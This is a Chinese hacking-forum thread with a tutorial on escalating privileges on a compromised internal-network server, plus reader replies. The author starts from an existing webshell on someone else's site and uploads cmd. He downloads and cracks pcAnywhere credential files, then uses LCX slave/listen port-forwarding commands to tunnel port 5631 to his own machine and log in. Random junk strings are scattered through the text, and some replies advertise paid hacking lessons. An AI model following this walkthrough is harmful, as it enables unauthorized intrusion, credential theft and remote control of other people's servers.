返回列表 发帖

[原创文章] pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。$ A/ ?; f/ S% w) C( O% X: v
( U" T8 v. D5 ]/ m
提权方法:pcanywhere+LCX
# U7 u# x' A1 e- e+ W- x& y; g- A7 U
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。: b- _2 l3 R4 w# v, e: |: n

2 C$ H$ C. }3 f1 s6 _1 U7 F在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。% a% J- d: K( E9 j
  {5 v0 k; v  t. R
4 ?" e' N9 u  v$ V; @$ ?7 m- C
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。& w/ e, V; t6 U! v' h# M
1 U4 [2 D  k- m' V& c( `7 Z
3 b% u# j) m( E
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。  I' J+ V' O& F- K. p- M
( @- V% C9 Y  A7 R+ z
) x, ^" ^% N+ Q7 p7 F. m1 d

6 b( ^$ _9 [. g" v, @! s5 B3 {0 f8 E
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``0 U( `1 ]$ t9 V3 `/ Z6 j

4 V, Y0 S) r7 Y" y' }4 Z8 }* q
$ R, L8 F4 G0 O- V, DLCX的用法再简单说下:; z- b0 E2 F2 x2 C5 I& i
5 Q0 G+ N, A0 I# F$ p
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
1 Q4 U" a7 U' ]+ E. Q2 Z. m! B* Z0 T6 G) U. D' ^* c
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
0 w9 q3 c& @. G! i/ w7 C" S) S4 I. O7 Y9 _+ g& |  @% g4 ^
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。6 `* e4 d. ]9 H3 P, T$ @
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``/ p  P' k+ K3 b( Q& F0 C& x

; l- m& h/ }1 c- x& G3 E+ s$ T; j3 V. ~8 X
/ }: j, B: t! a+ ^0 N
6 _5 z0 `: m6 u) ~- M9 J
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。- N9 E; y' m. x: `1 o; _4 J6 x
1 _# H# X! B* F/ l( ?& p+ S( W5 l9 }
- \- _! u' E* @% _7 b
1 R5 t# K  x( }" Z# v% C* \
4 e9 w; P! [$ ]" d
我们本地连接试试,输入我们刚破解的账号密码; P% i+ F5 O7 v) b/ e
0 G: m4 h* @3 L: ^7 a. d3 S
, v* a5 J, A* y! U3 S7 q) k- s
呵呵``连接成功,服务器不错,又一个8核^︵^3 b  m/ R* }: \; ^- o5 \2 i

# l9 g3 {1 _. T4 }1 ^! h9 f& y5 ]: L5 h& ~' [+ A0 h+ l$ X! m2 l3 |
: i- W8 L7 E! l" R
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
1

评分人数

  • 柔肠寸断

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.

TOP

顶起。。。。。。。。。
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

八核的哟

TOP

哎。。。。运气不佳```老碰见内网的。。。。

TOP

不错不错。。。你的貌似一直都是内网服务器哈
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

返回列表